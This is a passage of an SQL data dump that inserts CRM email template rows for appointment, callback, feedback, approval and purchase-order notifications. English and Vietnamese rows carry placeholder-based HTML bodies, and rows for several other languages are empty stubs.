(1931, 'appointly', 'callback-assigned-to-staff', 'english', 'Assigned to callback (Sent to Staff)', 'You have been assigned to handle a new callback!', '<span 12pt=\"\"><span 12pt=\"\">Hello {staff_firstname} {staff_lastname}<br /><br />An admin assigned a callback to you, you can view this callback request at the following link:</strong> <a href=\"{admin_url}/appointly/callbacks\">{admin_url}/appointly/callbacks</a></span><br /><br /><br />{companyname}<br />{crm_url}<br /><span 12pt=\"\"></span></span>', '{companyname} | CRM', NULL, 0, 1, 0),
(1932, 'appointly', 'newcallback-requested-to-staff', 'english', 'New callback request (Sent to Callbacks Responsible Person)', 'You have a new callback request!', '<span 12pt=\"\"><span 12pt=\"\">Hello {staff_firstname} {staff_lastname}<br /><br />A new callback request has just been submitted, fast navigate to callbacks to view latest callback submitted:</strong> <a href=\"{admin_url}/appointly/callbacks\">{admin_url}/appointly/callbacks</a></span><br /><br /><br />{companyname}<br />{crm_url}<br /><span 12pt=\"\"></span></span>', '{companyname} | CRM', NULL, 0, 1, 0),
(1933, 'appointly', 'appointly-appointment-request-feedback', 'english', 'Request Appointment Feedback (Sent to Client)', 'Feedback request for appointment!', '<span 12pt=\"\"><span 12pt=\"\">Hello {appointment_client_name} <br /><br />A new feedback request has just been submitted, please leave your comments and thoughts about this past appointment, fast navigate to the appointment to add a feedback:</strong> <a href=\"{appointment_public_url}\">{appointment_public_url}</a></span><br /><br /><br />{companyname}<br />{crm_url}<br /><span 12pt=\"\"></span></span>', '{companyname} | CRM', NULL, 0, 1, 0),
(1934, 'appointly', 'appointly-appointment-feedback-received', 'english', 'New Feedback Received (Sent to Responsible Person)', 'New appointment feedback rating received!', '<span 12pt=\"\"><span 12pt=\"\">Hello {staff_firstname} {staff_lastname} <br /><br />A new feedback rating has been received from client {appointment_client_name}. View the new feedback rating submitted at the following link:</strong> <a href=\"{appointment_admin_url}\">{appointment_admin_url}</a></span><br /><br /><br />{companyname}<br />{crm_url}<br /><span 12pt=\"\"></span></span>', '{companyname} | CRM', NULL, 0, 1, 0),
(1935, 'appointly', 'appointly-appointment-feedback-updated', 'english', 'Feedback Updated (Sent to Responsible Person)', 'Appointment feedback rating updated!', '<span 12pt=\"\"><span 12pt=\"\">Hello {staff_firstname} {staff_lastname} <br /><br />An existing feedback was just updated from client {appointment_client_name}. View the new rating submitted at the following link:</strong> <a href=\"{appointment_admin_url}\">{appointment_admin_url}</a></span><br /><br /><br />{companyname}<br />{crm_url}<br /><span 12pt=\"\"></span></span>', '{companyname} | CRM', NULL, 0, 1, 0),
(1936, 'approve', 'send-request-approve', 'english', 'Send Approval Request', 'Require Approval', '<p>Hi {staff_firstname}<br /><br />You have received a request to approve the {object_type}.<br /><br />You can view the {object_type} on the following link <a href=\"{object_link}\">{object_name}</a><br /><br />{email_signature}</p>', '{companyname} | CRM', NULL, 0, 1, 0),
(1937, 'approve', 'send-request-approve', 'vietnamese', 'Gửi yêu cầu phê duyệt', 'Yêu cầu phê duyệt', 'Xin ch&agrave;o {staff_firstname} {staff_lastname}<br /><br />Bạn đã nhận được yêu cầu phê duyệt {object_type} mới.<br /><br />Bạn c&oacute; thể xem hóa đơn tại đ&acirc;y&nbsp;<a href=\"{object_link}\">{object_name}</a><br /><br />{email_signature}', '{companyname} | CRM', NULL, 0, 1, 0),
(1938, 'approve', 'send_rejected', 'english', 'Send Rejected', 'The {object_type} has been rejected', '<p>Hi {staff_firstname}<br /><br />Your {object_type} has been rejected.<br /><br />You can view the {object_type} on the following link <a href=\"{object_link}\">{object_name}</a><br /><br />{email_signature}</p>', '{companyname} | CRM', NULL, 0, 1, 0),
(1939, 'approve', 'send_rejected', 'vietnamese', 'Gửi từ chối', '{object_type} đã bị từ chối', 'Xin ch&agrave;o {staff_firstname} {staff_lastname}<br /><br />{object_type} của bạn đã bị từ chối.<br /><br />Bạn c&oacute; thể xem {object_type} tại đ&acirc;y&nbsp;<a href=\"{object_link}\">{object_name}</a><br /><br />{email_signature}', '{companyname} | CRM', NULL, 0, 1, 0),
(1940, 'approve', 'send_approve', 'english', 'Send Approve', 'The {object_type} has been approved', '<p>Hi {staff_firstname}<br /><br />Your {object_type} has been approved.<br /><br />You can view the {object_type} on the following link <a href=\"{object_link}\">{object_name}</a><br /><br />{email_signature}</p>', '{companyname} | CRM', NULL, 0, 1, 0),
(1941, 'approve', 'send_approve', 'vietnamese', 'Gửi phê duyệt', '{object_type} đã được phê duyệt', 'Xin ch&agrave;o {staff_firstname} {staff_lastname}<br /><br />{object_type} của bạn đã được phê duyệt.<br /><br />Bạn c&oacute; thể xem {object_type} tại đ&acirc;y&nbsp;<a href=\"{object_link}\">{object_name}</a><br /><br />{email_signature}', '{companyname} | CRM', NULL, 0, 1, 0),
(1942, 'purchase_order', 'purchase-order-to-contact', 'swedish', 'Purchase Order (Sent to contact) [swedish]', 'Purchase Order', '', '{companyname} | CRM', '', 0, 1, 0),
(1943, 'appointly', 'appointment-cron-reminder-to-staff', 'swedish', 'Appointment reminder (Sent to Staff and Attendees) [swedish]', 'You have an upcoming appointment!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1944, 'appointly', 'appointment-recurring-to-staff', 'swedish', 'Appointment recurring (Sent to Staff and Attendees) [swedish]', 'Recurring appointment was re-created!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1945, 'appointly', 'appointment-cancelled-to-staff', 'swedish', 'Appointment cancelled (Sent to Staff and Attendees) [swedish]', 'Appointment has been cancelled!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1946, 'appointly', 'appointment-cancelled-to-contact', 'swedish', 'Appointment cancelled (Sent to Contact) [swedish]', 'Your appointment has been cancelled!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1947, 'appointly', 'appointment-cron-reminder-to-contact', 'swedish', 'Appointment reminder (Sent to Contact) [swedish]', 'You have an upcoming appointment!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1948, 'appointly', 'appointment-recurring-to-contacts', 'swedish', 'Appointment recurring (Sent to Contact) [swedish]', 'Recurring appointment was re-created!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1949, 'appointly', 'appointment-approved-to-staff', 'swedish', 'Appointment approved (Sent to Staff and Atendees) [swedish]', 'You are added as a appointment attendee!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1950, 'appointly', 'appointment-approved-to-contact', 'swedish', 'Appointment approved (Sent to Contact) [swedish]', 'Your appointment has been approved!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1951, 'appointly', 'appointment-submitted-to-staff', 'swedish', 'New appointment request (Sent to Responsible Person) [swedish]', 'New appointment request via external form!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1952, 'appointly', 'callback-assigned-to-staff', 'swedish', 'Assigned to callback (Sent to Staff) [swedish]', 'You have been assigned to handle a new callback!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1953, 'appointly', 'newcallback-requested-to-staff', 'swedish', 'New callback request (Sent to Callbacks Responsible Person) [swedish]', 'You have a new callback request!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1954, 'appointly', 'appointly-appointment-request-feedback', 'swedish', 'Request Appointment Feedback (Sent to Client) [swedish]', 'Feedback request for appointment!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1955, 'appointly', 'appointly-appointment-feedback-received', 'swedish', 'New Feedback Received (Sent to Responsible Person) [swedish]', 'New appointment feedback rating received!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1956, 'appointly', 'appointly-appointment-feedback-updated', 'swedish', 'Feedback Updated (Sent to Responsible Person) [swedish]', 'Appointment feedback rating updated!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1957, 'approve', 'send-request-approve', 'swedish', 'Send Approval Request [swedish]', 'Require Approval', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1958, 'approve', 'send_rejected', 'swedish', 'Send Rejected [swedish]', 'The {object_type} has been rejected', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1959, 'approve', 'send_approve', 'swedish', 'Send Approve [swedish]', 'The {object_type} has been approved', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1960, 'purchase_order', 'purchase-order-to-contact', 'portuguese', 'Purchase Order (Sent to contact) [portuguese]', 'Purchase Order', '', '{companyname} | CRM', '', 0, 1, 0),
(1961, 'appointly', 'appointment-cron-reminder-to-staff', 'portuguese', 'Appointment reminder (Sent to Staff and Attendees) [portuguese]', 'You have an upcoming appointment!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1962, 'appointly', 'appointment-recurring-to-staff', 'portuguese', 'Appointment recurring (Sent to Staff and Attendees) [portuguese]', 'Recurring appointment was re-created!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1963, 'appointly', 'appointment-cancelled-to-staff', 'portuguese', 'Appointment cancelled (Sent to Staff and Attendees) [portuguese]', 'Appointment has been cancelled!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1964, 'appointly', 'appointment-cancelled-to-contact', 'portuguese', 'Appointment cancelled (Sent to Contact) [portuguese]', 'Your appointment has been cancelled!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1965, 'appointly', 'appointment-cron-reminder-to-contact', 'portuguese', 'Appointment reminder (Sent to Contact) [portuguese]', 'You have an upcoming appointment!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1966, 'appointly', 'appointment-recurring-to-contacts', 'portuguese', 'Appointment recurring (Sent to Contact) [portuguese]', 'Recurring appointment was re-created!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1967, 'appointly', 'appointment-approved-to-staff', 'portuguese', 'Appointment approved (Sent to Staff and Atendees) [portuguese]', 'You are added as a appointment attendee!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1968, 'appointly', 'appointment-approved-to-contact', 'portuguese', 'Appointment approved (Sent to Contact) [portuguese]', 'Your appointment has been approved!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1969, 'appointly', 'appointment-submitted-to-staff', 'portuguese', 'New appointment request (Sent to Responsible Person) [portuguese]', 'New appointment request via external form!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1970, 'appointly', 'callback-assigned-to-staff', 'portuguese', 'Assigned to callback (Sent to Staff) [portuguese]', 'You have been assigned to handle a new callback!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1971, 'appointly', 'newcallback-requested-to-staff', 'portuguese', 'New callback request (Sent to Callbacks Responsible Person) [portuguese]', 'You have a new callback request!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1972, 'appointly', 'appointly-appointment-request-feedback', 'portuguese', 'Request Appointment Feedback (Sent to Client) [portuguese]', 'Feedback request for appointment!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1973, 'appointly', 'appointly-appointment-feedback-received', 'portuguese', 'New Feedback Received (Sent to Responsible Person) [portuguese]', 'New appointment feedback rating received!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1974, 'appointly', 'appointly-appointment-feedback-updated', 'portuguese', 'Feedback Updated (Sent to Responsible Person) [portuguese]', 'Appointment feedback rating updated!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1975, 'approve', 'send-request-approve', 'portuguese', 'Send Approval Request [portuguese]', 'Require Approval', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1976, 'approve', 'send_rejected', 'portuguese', 'Send Rejected [portuguese]', 'The {object_type} has been rejected', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1977, 'approve', 'send_approve', 'portuguese', 'Send Approve [portuguese]', 'The {object_type} has been approved', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1978, 'purchase_order', 'purchase-order-to-contact', 'turkish', 'Purchase Order (Sent to contact) [turkish]', 'Purchase Order', '', '{companyname} | CRM', '', 0, 1, 0),
(1979, 'appointly', 'appointment-cron-reminder-to-staff', 'turkish', 'Appointment reminder (Sent to Staff and Attendees) [turkish]', 'You have an upcoming appointment!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1980, 'appointly', 'appointment-recurring-to-staff', 'turkish', 'Appointment recurring (Sent to Staff and Attendees) [turkish]', 'Recurring appointment was re-created!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1981, 'appointly', 'appointment-cancelled-to-staff', 'turkish', 'Appointment cancelled (Sent to Staff and Attendees) [turkish]', 'Appointment has been cancelled!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1982, 'appointly', 'appointment-cancelled-to-contact', 'turkish', 'Appointment cancelled (Sent to Contact) [turkish]', 'Your appointment has been cancelled!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1983, 'appointly', 'appointment-cron-reminder-to-contact', 'turkish', 'Appointment reminder (Sent to Contact) [turkish]', 'You have an upcoming appointment!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1984, 'appointly', 'appointment-recurring-to-contacts', 'turkish', 'Appointment recurring (Sent to Contact) [turkish]', 'Recurring appointment was re-created!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1985, 'appointly', 'appointment-approved-to-staff', 'turkish', 'Appointment approved (Sent to Staff and Atendees) [turkish]', 'You are added as a appointment attendee!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1986, 'appointly', 'appointment-approved-to-contact', 'turkish', 'Appointment approved (Sent to Contact) [turkish]', 'Your appointment has been approved!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1987, 'appointly', 'appointment-submitted-to-staff', 'turkish', 'New appointment request (Sent to Responsible Person) [turkish]', 'New appointment request via external form!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1988, 'appointly', 'callback-assigned-to-staff', 'turkish', 'Assigned to callback (Sent to Staff) [turkish]', 'You have been assigned to handle a new callback!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1989, 'appointly', 'newcallback-requested-to-staff', 'turkish', 'New callback request (Sent to Callbacks Responsible Person) [turkish]', 'You have a new callback request!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1990, 'appointly', 'appointly-appointment-request-feedback', 'turkish', 'Request Appointment Feedback (Sent to Client) [turkish]', 'Feedback request for appointment!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1991, 'appointly', 'appointly-appointment-feedback-received', 'turkish', 'New Feedback Received (Sent to Responsible Person) [turkish]', 'New appointment feedback rating received!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1992, 'appointly', 'appointly-appointment-feedback-updated', 'turkish', 'Feedback Updated (Sent to Responsible Person) [turkish]', 'Appointment feedback rating updated!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1993, 'approve', 'send-request-approve', 'turkish', 'Send Approval Request [turkish]', 'Require Approval', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1994, 'approve', 'send_rejected', 'turkish', 'Send Rejected [turkish]', 'The {object_type} has been rejected', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1995, 'approve', 'send_approve', 'turkish', 'Send Approve [turkish]', 'The {object_type} has been approved', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1996, 'purchase_order', 'purchase-order-to-contact', 'bulgarian', 'Purchase Order (Sent to contact) [bulgarian]', 'Purchase Order', '', '{companyname} | CRM', '', 0, 1, 0),
(1997, 'appointly', 'appointment-cron-reminder-to-staff', 'bulgarian', 'Appointment reminder (Sent to Staff and Attendees) [bulgarian]', 'You have an upcoming appointment!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1998, 'appointly', 'appointment-recurring-to-staff', 'bulgarian', 'Appointment recurring (Sent to Staff and Attendees) [bulgarian]', 'Recurring appointment was re-created!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1999, 'appointly', 'appointment-cancelled-to-staff', 'bulgarian', 'Appointment cancelled (Sent to Staff and Attendees) [bulgarian]', 'Appointment has been cancelled!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2000, 'appointly', 'appointment-cancelled-to-contact', 'bulgarian', 'Appointment cancelled (Sent to Contact) [bulgarian]', 'Your appointment has been cancelled!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2001, 'appointly', 'appointment-cron-reminder-to-contact', 'bulgarian', 'Appointment reminder (Sent to Contact) [bulgarian]', 'You have an upcoming appointment!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2002, 'appointly', 'appointment-recurring-to-contacts', 'bulgarian', 'Appointment recurring (Sent to Contact) [bulgarian]', 'Recurring appointment was re-created!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2003, 'appointly', 'appointment-approved-to-staff', 'bulgarian', 'Appointment approved (Sent to Staff and Atendees) [bulgarian]', 'You are added as a appointment attendee!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2004, 'appointly', 'appointment-approved-to-contact', 'bulgarian', 'Appointment approved (Sent to Contact) [bulgarian]', 'Your appointment has been approved!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2005, 'appointly', 'appointment-submitted-to-staff', 'bulgarian', 'New appointment request (Sent to Responsible Person) [bulgarian]', 'New appointment request via external form!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2006, 'appointly', 'callback-assigned-to-staff', 'bulgarian', 'Assigned to callback (Sent to Staff) [bulgarian]', 'You have been assigned to handle a new callback!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2007, 'appointly', 'newcallback-requested-to-staff', 'bulgarian', 'New callback request (Sent to Callbacks Responsible Person) [bulgarian]', 'You have a new callback request!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2008, 'appointly', 'appointly-appointment-request-feedback', 'bulgarian', 'Request Appointment Feedback (Sent to Client) [bulgarian]', 'Feedback request for appointment!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2009, 'appointly', 'appointly-appointment-feedback-received', 'bulgarian', 'New Feedback Received (Sent to Responsible Person) [bulgarian]', 'New appointment feedback rating received!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2010, 'appointly', 'appointly-appointment-feedback-updated', 'bulgarian', 'Feedback Updated (Sent to Responsible Person) [bulgarian]', 'Appointment feedback rating updated!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2011, 'approve', 'send-request-approve', 'bulgarian', 'Send Approval Request [bulgarian]', 'Require Approval', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2012, 'approve', 'send_rejected', 'bulgarian', 'Send Rejected [bulgarian]', 'The {object_type} has been rejected', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2013, 'approve', 'send_approve', 'bulgarian', 'Send Approve [bulgarian]', 'The {object_type} has been approved', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2014, 'purchase_order', 'purchase-order-to-contact', 'dutch', 'Purchase Order (Sent to contact) [dutch]', 'Purchase Order', '', '{companyname} | CRM', '', 0, 1, 0),
(2015, 'appointly', 'appointment-cron-reminder-to-staff', 'dutch', 'Appointment reminder (Sent to Staff and Attendees) [dutch]', 'You have an upcoming appointment!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2016, 'appointly', 'appointment-recurring-to-staff', 'dutch', 'Appointment recurring (Sent to Staff and Attendees) [dutch]', 'Recurring appointment was re-created!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2017, 'appointly', 'appointment-cancelled-to-staff', 'dutch', 'Appointment cancelled (Sent to Staff and Attendees) [dutch]', 'Appointment has been cancelled!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2018, 'appointly', 'appointment-cancelled-to-contact', 'dutch', 'Appointment cancelled (Sent to Contact) [dutch]', 'Your appointment has been cancelled!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2019, 'appointly', 'appointment-cron-reminder-to-contact', 'dutch', 'Appointment reminder (Sent to Contact) [dutch]', 'You have an upcoming appointment!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2020, 'appointly', 'appointment-recurring-to-contacts', 'dutch', 'Appointment recurring (Sent to Contact) [dutch]', 'Recurring appointment was re-created!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2021, 'appointly', 'appointment-approved-to-staff', 'dutch', 'Appointment approved (Sent to Staff and Atendees) [dutch]', 'You are added as a appointment attendee!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2022, 'appointly', 'appointment-approved-to-contact', 'dutch', 'Appointment approved (Sent to Contact) [dutch]', 'Your appointment has been approved!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2023, 'appointly', 'appointment-submitted-to-staff', 'dutch', 'New appointment request (Sent to Responsible Person) [dutch]', 'New appointment request via external form!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2024, 'appointly', 'callback-assigned-to-staff', 'dutch', 'Assigned to callback (Sent to Staff) [dutch]', 'You have been assigned to handle a new callback!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2025, 'appointly', 'newcallback-requested-to-staff', 'dutch', 'New callback request (Sent to Callbacks Responsible Person) [dutch]', 'You have a new callback request!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2026, 'appointly', 'appointly-appointment-request-feedback', 'dutch', 'Request Appointment Feedback (Sent to Client) [dutch]', 'Feedback request for appointment!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2027, 'appointly', 'appointly-appointment-feedback-received', 'dutch', 'New Feedback Received (Sent to Responsible Person) [dutch]', 'New appointment feedback rating received!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2028, 'appointly', 'appointly-appointment-feedback-updated', 'dutch', 'Feedback Updated (Sent to Responsible Person) [dutch]', 'Appointment feedback rating updated!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2029, 'approve', 'send-request-approve', 'dutch', 'Send Approval Request [dutch]', 'Require Approval', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2030, 'approve', 'send_rejected', 'dutch', 'Send Rejected [dutch]', 'The {object_type} has been rejected', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2031, 'approve', 'send_approve', 'dutch', 'Send Approve [dutch]', 'The {object_type} has been approved', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2032, 'purchase_order', 'purchase-order-to-contact', 'russian', 'Purchase Order (Sent to contact) [russian]', 'Purchase Order', '', '{companyname} | CRM', '', 0, 1, 0),
(2033, 'appointly', 'appointment-cron-reminder-to-staff', 'russian', 'Appointment reminder (Sent to Staff and Attendees) [russian]', 'You have an upcoming appointment!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2034, 'appointly', 'appointment-recurring-to-staff', 'russian', 'Appointment recurring (Sent to Staff and Attendees) [russian]', 'Recurring appointment was re-created!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2035, 'appointly', 'appointment-cancelled-to-staff', 'russian', 'Appointment cancelled (Sent to Staff and Attendees) [russian]', 'Appointment has been cancelled!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2036, 'appointly', 'appointment-cancelled-to-contact', 'russian', 'Appointment cancelled (Sent to Contact) [russian]', 'Your appointment has been cancelled!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2037, 'appointly', 'appointment-cron-reminder-to-contact', 'russian', 'Appointment reminder (Sent to Contact) [russian]', 'You have an upcoming appointment!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2038, 'appointly', 'appointment-recurring-to-contacts', 'russian', 'Appointment recurring (Sent to Contact) [russian]', 'Recurring appointment was re-created!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2039, 'appointly', 'appointment-approved-to-staff', 'russian', 'Appointment approved (Sent to Staff and Atendees) [russian]', 'You are added as a appointment attendee!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2040, 'appointly', 'appointment-approved-to-contact', 'russian', 'Appointment approved (Sent to Contact) [russian]', 'Your appointment has been approved!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2041, 'appointly', 'appointment-submitted-to-staff', 'russian', 'New appointment request (Sent to Responsible Person) [russian]', 'New appointment request via external form!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2042, 'appointly', 'callback-assigned-to-staff', 'russian', 'Assigned to callback (Sent to Staff) [russian]', 'You have been assigned to handle a new callback!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2043, 'appointly', 'newcallback-requested-to-staff', 'russian', 'New callback request (Sent to Callbacks Responsible Person) [russian]', 'You have a new callback request!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2044, 'appointly', 'appointly-appointment-request-feedback', 'russian', 'Request Appointment Feedback (Sent to Client) [russian]', 'Feedback request for appointment!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2045, 'appointly', 'appointly-appointment-feedback-received', 'russian', 'New Feedback Received (Sent to Responsible Person) [russian]', 'New appointment feedback rating received!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2046, 'appointly', 'appointly-appointment-feedback-updated', 'russian', 'Feedback Updated (Sent to Responsible Person) [russian]', 'Appointment feedback rating updated!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2047, 'approve', 'send-request-approve', 'russian', 'Send Approval Request [russian]', 'Require Approval', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2048, 'approve', 'send_rejected', 'russian', 'Send Rejected [russian]', 'The {object_type} has been rejected', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2049, 'approve', 'send_approve', 'russian', 'Send Approve [russian]', 'The {object_type} has been approved', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2050, 'purchase_order', 'purchase-order-to-contact', 'greek', 'Purchase Order (Sent to contact) [greek]', 'Purchase Order', '', '{companyname} | CRM', '', 0, 1, 0),
(2051, 'appointly', 'appointment-cron-reminder-to-staff', 'greek', 'Appointment reminder (Sent to Staff and Attendees) [greek]', 'You have an upcoming appointment!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2052, 'appointly', 'appointment-recurring-to-staff', 'greek', 'Appointment recurring (Sent to Staff and Attendees) [greek]', 'Recurring appointment was re-created!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2053, 'appointly', 'appointment-cancelled-to-staff', 'greek', 'Appointment cancelled (Sent to Staff and Attendees) [greek]', 'Appointment has been cancelled!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2054, 'appointly', 'appointment-cancelled-to-contact', 'greek', 'Appointment cancelled (Sent to Contact) [greek]', 'Your appointment has been cancelled!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2055, 'appointly', 'appointment-cron-reminder-to-contact', 'greek', 'Appointment reminder (Sent to Contact) [greek]', 'You have an upcoming appointment!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2056, 'appointly', 'appointment-recurring-to-contacts', 'greek', 'Appointment recurring (Sent to Contact) [greek]', 'Recurring appointment was re-created!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2057, 'appointly', 'appointment-approved-to-staff', 'greek', 'Appointment approved (Sent to Staff and Atendees) [greek]', 'You are added as a appointment attendee!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2058, 'appointly', 'appointment-approved-to-contact', 'greek', 'Appointment approved (Sent to Contact) [greek]', 'Your appointment has been approved!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2059, 'appointly', 'appointment-submitted-to-staff', 'greek', 'New appointment request (Sent to Responsible Person) [greek]', 'New appointment request via external form!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2060, 'appointly', 'callback-assigned-to-staff', 'greek', 'Assigned to callback (Sent to Staff) [greek]', 'You have been assigned to handle a new callback!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2061, 'appointly', 'newcallback-requested-to-staff', 'greek', 'New callback request (Sent to Callbacks Responsible Person) [greek]', 'You have a new callback request!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2062, 'appointly', 'appointly-appointment-request-feedback', 'greek', 'Request Appointment Feedback (Sent to Client) [greek]', 'Feedback request for appointment!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2063, 'appointly', 'appointly-appointment-feedback-received', 'greek', 'New Feedback Received (Sent to Responsible Person) [greek]', 'New appointment feedback rating received!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2064, 'appointly', 'appointly-appointment-feedback-updated', 'greek', 'Feedback Updated (Sent to Responsible Person) [greek]', 'Appointment feedback rating updated!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2065, 'approve', 'send-request-approve', 'greek', 'Send Approval Request [greek]', 'Require Approval', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2066, 'approve', 'send_rejected', 'greek', 'Send Rejected [greek]', 'The {object_type} has been rejected', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2067, 'approve', 'send_approve', 'greek', 'Send Approve [greek]', 'The {object_type} has been approved', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2068, 'purchase_order', 'purchase-order-to-contact', 'catalan', 'Purchase Order (Sent to contact) [catalan]', 'Purchase Order', '', '{companyname} | CRM', '', 0, 1, 0),
(2069, 'appointly', 'appointment-cron-reminder-to-staff', 'catalan', 'Appointment reminder (Sent to Staff and Attendees) [catalan]', 'You have an upcoming appointment!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2070, 'appointly', 'appointment-recurring-to-staff', 'catalan', 'Appointment recurring (Sent to Staff and Attendees) [catalan]', 'Recurring appointment was re-created!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2071, 'appointly', 'appointment-cancelled-to-staff', 'catalan', 'Appointment cancelled (Sent to Staff and Attendees) [catalan]', 'Appointment has been cancelled!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2072, 'appointly', 'appointment-cancelled-to-contact', 'catalan', 'Appointment cancelled (Sent to Contact) [catalan]', 'Your appointment has been cancelled!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2073, 'appointly', 'appointment-cron-reminder-to-contact', 'catalan', 'Appointment reminder (Sent to Contact) [catalan]', 'You have an upcoming appointment!', '', '{companyname} | CRM', NULL, 0, 1, 0),
